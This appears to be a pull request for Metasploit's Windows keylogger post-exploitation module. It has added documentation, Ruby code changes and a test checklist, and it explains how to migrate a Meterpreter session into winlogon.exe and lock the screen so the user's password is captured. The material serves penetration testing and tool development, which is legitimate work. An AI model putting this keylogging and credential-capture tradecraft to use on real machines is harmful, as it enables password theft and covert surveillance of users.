### PR TITLE
Win/keylog_recorder Major Update

### DIFF
--- a/documentation/modules/post/windows/capture/keylog_recorder.md
+++ b/documentation/modules/post/windows/capture/keylog_recorder.md
@@ -1,0 +1,73 @@
+## Overview
+
+This module captures keystrokes from a Windows target and saves them to a text file in loot. Keystrokes can be captured from explorer.exe, winlogon.exe, or a specific process of your choice. The module is capable of being run as a job to keep the Framework's user interface available for other tasks.
+
+## Requirements
+- Windows Meterpreter Session
+
+## Module Options
+- **CAPTURE_TYPE** - This option sets the process where the module records keystrokes. Accepted: explorer, winlogon, or pid. Default value is explorer.
+
+- **INTERVAL** - The interval in seconds that the module uses for recording keystrokes. The log file goes to a new line at the end of each interval. Default value is 5 seconds.
+
+- **LOCKSCREEN** - This option locks the screen of the target when set to TRUE. CAPTURE_TYPE must be set to winlogon. MIGRATE must be set to TRUE or the session must already be in winlogon.exe. Defalt value is FALSE.
+
+- **MIGRATE** - This option migrates the session based on the CAPTURE_TYPE. Explorer.exe for explorer, winlogon.exe for winlogon, or a specified PID for pid. Default value is FALSE.
+
+- **PID** - The PID of a process to migrate the session into. CAPTURE_TYPE of pid must be set, and the sepecified PID must exist on the target machine.
+
+- **SESSION** - The session to run the module on.
+
+### Advanced Options
+- **ShowKeystrokes** - This option prints the captured keystrokes to the Framework UI on the specified interval. Default is FALSE.
+- **TimeOutAction** - This option sets the behavior the module takes if the key capture request times out. (See below.) Accepted: wait or exit. Default value is wait.
+
+## Usage
+The Meterpreter session must be located in an appropriate process for keystroke recording to work properly. This is described in the below-listed capture types. This module can migrate the session if MIGRATE is set to TRUE. Set MIGRATE to FALSE if migration will be performed manually or through another module.
+
+### Capture Types
+- **Explorer.exe** - __Session must be in explorer.exe__ - The most common capture type. Keystrokes are recorded from most user level applications. Applications running at an elevated level will likely not get recorded. **NOTE: Sessions running with elevated privileges are downgraded to user level when migrated into explorer.exe.** It is recommended that a second session be opened for keystroke recording if elevated priveledges are to be maintained.
+
+- **Winlogon.exe** - __Session must be in winlogon.exe__ - Administrator or SYSTEM rights are required to migrate to winlogon.exe. Keylogging from this process records usernames and passwords as users log in. This capture type does not record keystrokes from any other process. Setting LOCKSCREEN to true locks Windows when the module is executed. This forces the user to unlock the computer, and their password is captured.
+
+- **PID** - __Session must be in the specific process to be recorded.__ - This option is useful for recording keystrokes in applications or process that run with elevated priveledges. However, admin or SYSTEM rights are required to migrate to these processes. Only keystrokes from the specified process are recorded.
+
+## Running Module as a Job
+It is recommended to run this module as a job using: `exploit -j` or `run -j`. As a job, the module runs in the background preventing it from tying up the Framework's user interface. To stop capturing keystrokes, kill the job using `jobs -k`. The module records the last few keystrokes before exit. Stopping the job can take up to 30 seconds. If the session is killed, the key log job shuts down automatically.
+
+### TimeOutAction
+This module has two actions it can take if SessionCommunicationTimeout is reached. This occurs with packet-based payloads like `reverse_http` or `reverse_https` when the target system stops responding to requests for a specific period of time. The default is 300 seconds. Communications can stop due to various events such as network problems, system shut down, system sleep, or user log off.
+
+- **WAIT** - With this option selected, the module suspends attempting to gather keystrokes after the timeout. It waits for the session to become active again, then resumes capturing keystrokes. The output log reflects that recording was suspended along with a timestamp. If the session becomes active again, the log indicates this along with a timestamp. The wait option allows keystrokes to be logged over multiple system sleep cycles. In the event that the session dies, the recording job is stopped automatically.
+
+- **EXIT** - With this option selected, the module exits and the job is killed when the timeout occurs. The output log reflects the exit along with a timestamp.
+
+## Example Output
+```
+Keystroke log from explorer.exe on JULY with user JULY\User started at 2016-07-13 21:01:56 -0500
+
+This is an ex
+ample output from keylog_recorder.
+ <Return>  <Return> On this line I make a typpor <Back>  <Back>  <Back> 
+o. <Return> 
+ <Return> Username <Tab> Password <Return> 
+ <Return> 
+ <N1>  <N9>  <N2>  <Decimal>  <N1>  <N6>  <N8>  <Decimal>  <N1>  <Decimal>  <N1>  <N0>  <N0>  <Return> 
+ Copy <Left>  <Left>  <Left>  <Left>  <Ctrl>  <LCtrl> c <Right>  <Right>  <Right>  <Right>  <Return>  <Return>  <Ctrl>  <LCtrl> v <Return>  <Return> 
+
+Keylog Recorder timed out - now waiting at 2016-07-13 21:09:33 -0500
+
+
+Keylog Recorder resumed at 2016-07-13 21:11:36 -0500
+
+ <Return> T
+his is keys logged after the computer
+ was put to sleep and then woken back up.
+ <Return> 
+
+Keylog Recorder exited at 2016-07-13 21:12:44 -0500
+```
+
+
+
+

--- a/documentation/modules/post/windows/capture/keylog_recorder.md
+++ b/documentation/modules/post/windows/capture/keylog_recorder.md
@@ -23,7 +23,7 @@ This module captures keystrokes from a Windows target and saves them to a text f
 - **TimeOutAction** - This option sets the behavior the module takes if the key capture request times out. (See below.) Accepted: wait or exit. Default value is wait.
 
 ## Usage
-The Meterpreter session must be located in an appropriate process for keystroke recording to work properly. This is described in the below-listed capture types. This module can migrate the session if MIGRATE is set to TRUE. Set MIGRATE to FALSE if migration will be performed manually or through another module.
+The Meterpreter session must be located in an appropriate process for keystroke recording to work properly. This is described in the below-listed capture types. This module can migrate the session if MIGRATE is set to TRUE. If winlogon or PID migration fails, the module will use explorer migration and CAPTURE_TYPE. Set MIGRATE to FALSE if migration will be performed manually or through another module. 
 
 ### Capture Types
 - **Explorer.exe** - __Session must be in explorer.exe__ - The most common capture type. Keystrokes are recorded from most user level applications. Applications running at an elevated level will likely not get recorded. **NOTE: Sessions running with elevated privileges are downgraded to user level when migrated into explorer.exe.** It is recommended that a second session be opened for keystroke recording if elevated priveledges are to be maintained.
@@ -41,6 +41,9 @@ This module has two actions it can take if SessionCommunicationTimeout is reache
 - **WAIT** - With this option selected, the module suspends attempting to gather keystrokes after the timeout. It waits for the session to become active again, then resumes capturing keystrokes. The output log reflects that recording was suspended along with a timestamp. If the session becomes active again, the log indicates this along with a timestamp. The wait option allows keystrokes to be logged over multiple system sleep cycles. In the event that the session dies, the recording job is stopped automatically.
 
 - **EXIT** - With this option selected, the module exits and the job is killed when the timeout occurs. The output log reflects the exit along with a timestamp.
+
+### Running Module Stand Alone
+When running the module stand alone, it will prevent the Framework UI from being use for anything else until you exit the module. Use `CTRL-C` to exit. The module will save the last few keystrokes. This may take up to 30 seconds to complete.
 
 ## Example Output
 ```

--- a/modules/post/windows/capture/keylog_recorder.rb
+++ b/modules/post/windows/capture/keylog_recorder.rb
@@ -185,7 +185,7 @@ class MetasploitModule < Msf::Post
       client.core.migrate(target_pid)
       print_good("Successfully migrated to #{client.sys.process.open.name} (#{client.sys.process.open.pid}) as: #{client.sys.config.getuid}")
       return true
-    rescue ::Rex::Post::Meterpreter::RequestError => error
+    rescue ::Rex::RuntimeError => error
       print_error("Could not migrate to #{proc_name}.")
       print_error(error.to_s)
       return false
@@ -218,7 +218,7 @@ class MetasploitModule < Msf::Post
       client.core.migrate(target_pid)
       print_good("Successfully migrated to #{client.sys.process.open.name} (#{client.sys.process.open.pid}) as: #{client.sys.config.getuid}")
       return true
-    rescue ::Rex::Post::Meterpreter::RequestError => error
+     rescue ::Rex::RuntimeError => error
       print_error("Could not migrate to PID #{target_pid}.")
       print_error(error.to_s)
       return false

--- a/modules/post/windows/capture/keylog_recorder.rb
+++ b/modules/post/windows/capture/keylog_recorder.rb
@@ -62,7 +62,9 @@ class MetasploitModule < Msf::Post
       end
     end
 
-    if startkeylogger
+    lock_screen if datastore['LOCKSCREEN'] && get_process_name == "winlogon.exe"
+
+    if start_keylogger
       @logfile = set_log
       keycap
     end
@@ -139,9 +141,7 @@ class MetasploitModule < Msf::Post
       if is_uac_enabled? and not is_admin?
         print_error("UAC is enabled on this host! Winlogon migration will be blocked. Using Explorer instead.")
       else
-        success = migrate(get_pid("winlogon.exe"), "winlogon.exe", session.sys.process.getpid)
-        lock_screen if datastore['LOCKSCREEN'] && success
-        return success
+        return migrate(get_pid("winlogon.exe"), "winlogon.exe", session.sys.process.getpid)
       end
     end
 
@@ -229,7 +229,7 @@ class MetasploitModule < Msf::Post
   #
   # @return [TrueClass] keylogger started successfully
   # @return [FalseClass] keylogger failed to start
-  def startkeylogger
+  def start_keylogger
     session.ui.keyscan_stop rescue nil #Stop keyscan if it was already running for some reason.
     begin
       print_status("Starting the keylog recorder...")

--- a/modules/post/windows/capture/keylog_recorder.rb
+++ b/modules/post/windows/capture/keylog_recorder.rb
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Post
           to the user's privileges, so it makes sense to create a separate session for this task. The Winlogon
           option will capture the username and password entered into the logon and unlock dialog. The LOCKSCREEN
           option can be combined with the Winlogon CAPTURE_TYPE to for the user to enter their clear-text
-          password.
+          password. It is recommended to run this module as a job, otherwise it will tie up your framework user interface.
             },
         'License'        => MSF_LICENSE,
         'Author'         => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>',
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Post
     if @interval < 1
       print_error("INTERVAL value out of bounds. Setting to 5.")
       @interval = 5
-    end    
+    end
   end
 
   # This function sets the log file and loot entry.
@@ -112,7 +112,7 @@ class MetasploitModule < Msf::Post
   end
 
   # This function returns the process name that the session is running in.
-  # 
+  #
   # Note: "session.sys.process[proc_name]" will not work when "include Msf::Post::Windows::Priv" is in the module.
   #
   # @return [String Class] the session process's name
@@ -270,7 +270,7 @@ class MetasploitModule < Msf::Post
           write_keylog_data
         else
           if !session.alive?
-            print_status("Session: #{datastore['SESSION']} has been closed. Exiting keylog recorder.")
+            vprint_status("Session: #{datastore['SESSION']} has been closed. Exiting keylog recorder.")
             rec = 0
           end
         end
@@ -316,7 +316,7 @@ class MetasploitModule < Msf::Post
   def session_good?
     return false if !session.alive?
     if @timed_out
-      if get_session_age < @timed_out_age && @wait  
+      if get_session_age < @timed_out_age && @wait
         time_stamp("resumed")
         @timed_out = false       #reset timed out to false, if module set to wait and session becomes active again.
       end

--- a/modules/post/windows/capture/keylog_recorder.rb
+++ b/modules/post/windows/capture/keylog_recorder.rb
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Post
 
   # Returns the path name to the stored loot filename
   def set_log
-    store_loot("host.windows.keystrokes", "text/plain", session, "Keystroke log started at #{Time.now.to_s}\n", "keystrokes.txt", "User Keystrokes")
+    store_loot("host.windows.keystrokes", "text/plain", session, "Keystroke log on #{sysinfo['Computer']} with user #{client.sys.config.getuid} started at #{Time.now.to_s}\n", "keystrokes.txt", "User Keystrokes")
   end
 
   def lock_screen


### PR DESCRIPTION
## Overview

This PR updates post/windows/capture/keylog_recorder. The primary goal of the update was to make the module more robust so it can be run reliably as a job.
## Updates
- Option to pause recording on SessionCommunicationTimeout and resume if the session becomes active again. Can record keystrokes after Windows is put to sleep and wakes back up, when used with packet-based payloads like `reverse_http` or `reverse_https`.
- Option to stop job (exit module) on SessionCommunicationTimeout
- Better error handling in the migration procedures.
- Fixes the multiple user explorer.exe migration issue similar to PR's #7087 and #6557 
- Uses session.ui.keyscan_extract to keep keystroke recording consistent with other Framework key loggers.
- Exits cleanly and stops job when the session is killed.
- Exits cleanly when the job is killed, makes sure that last few keystrokes are recorded.
- Better system information and event logging in the output file.
- Adds module documentation.
## Verification

Fireup msfconsole and a Windows box or two. Use a `reverse_http` or `reverse_https` payload. Get some sessions going.

**_Migration Verification**_ Set MIGRATE to TRUE
- [ ] Test each of the migration options: explorer, winlogon, PID. (winlogon needs admin, PID may depending on process selected) Make sure that each migrates correctly.
- [ ] Have two users logged in at the same time. Make sure you can migrate to explorer for both users.
- [ ] Make sure winlogon or PID migration errors fall back to explorer migration and it succeeds.

**_Keylog Testing**_
- [ ] In explorer mode: make sure that keys get recorded for most user level processes
- [ ] In winlogon mode: make sure they keys get recorded during login. (Test lock screen option.)
- [ ] In PID mode: make sure that keys get recorded from a specific process like notepad running as admin.
- [ ] Log should include process name, system name, and user name
- [ ] Module should work correctly when not run as a job. CTRL-C to exit.

**_Run as Job Testing**_  Run module as a new job for each
- [ ] Kill the job - Make sure it exits cleanly and gets your last few keystrokes (May to take up to 30 seconds)
- [ ] Kill the session - Make sure job shuts down (May take up to 30 seconds)
- [ ] Logout of Windows, Kill job - Should exit cleanly.
- [ ] Logout of Windows, Kill session - Job should exit cleanly on its own.
- [ ] Make sure TimeOutAction is wait. Type a bit, put Windows to sleep, wait > 300 seconds, wake up and type again. It should log the keys and the events.
- [ ] Set TimeOutAction to exit. Logout or put Windows to sleep, wait > 300 seconds, module should exit cleanly.
### Sample logfile

```
Keystroke log from explorer.exe on JULY with user JULY\User started at 2016-07-13 21:01:56 -0500

This is an ex
ample output from keylog_recorder.
 <Return>  <Return> On this line I make a typpor <Back>  <Back>  <Back> 
o. <Return> 
 <Return> Username <Tab> Password <Return> 
 <Return> 
 <N1>  <N9>  <N2>  <Decimal>  <N1>  <N6>  <N8>  <Decimal>  <N1>  <Decimal>  <N1>  <N0>  <N0>  <Return> 
 Copy <Left>  <Left>  <Left>  <Left>  <Ctrl>  <LCtrl> c <Right>  <Right>  <Right>  <Right>  <Return>  <Return>  <Ctrl>  <LCtrl> v <Return>  <Return> 

Keylog Recorder timed out - now waiting at 2016-07-13 21:09:33 -0500


Keylog Recorder resumed at 2016-07-13 21:11:36 -0500

 <Return> T
his is keys logged after the computer
 was put to sleep and then woken back up.
 <Return> 

Keylog Recorder exited at 2016-07-13 21:12:44 -0500
```
### Other Remarks
- Cleanup gets run twice when the job is killed. This appears to be a Framework thing and does not impact the operation of this module
- When a Meterpreter session is in winlogon.exe on Windows 10, it may not let you log in. It will let you enter a password but then go back to the lock screen. I have experienced this with multiple machines lately. However, this module will still grab the password.
